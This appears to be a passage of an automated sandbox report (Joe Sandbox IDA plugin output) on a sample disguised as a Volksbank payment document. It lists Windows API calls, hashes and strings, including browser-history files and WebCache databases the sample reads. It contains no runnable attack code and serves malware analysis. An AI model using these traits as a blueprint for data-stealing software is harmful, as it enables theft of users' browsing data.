                                                                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
• Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
• Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
• Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
• Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
• Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
• Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
• Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
• Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
• Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
• Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
• Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
• Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
• Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
• Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
• Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
APIs
• ??3@YAXPAX@Z.MSVCRT(02380048), ref: 0044DF01
• ??3@YAXPAX@Z.MSVCRT(02390050), ref: 0044DF11
• ??3@YAXPAX@Z.MSVCRT(00C66E78), ref: 0044DF21
• ??3@YAXPAX@Z.MSVCRT(02390458), ref: 0044DF31
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                          • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                          • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76942EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
• Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
• Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
• Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
• Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
• Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
Strings
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
• Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
• Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
• Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3397143404-0
                                                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
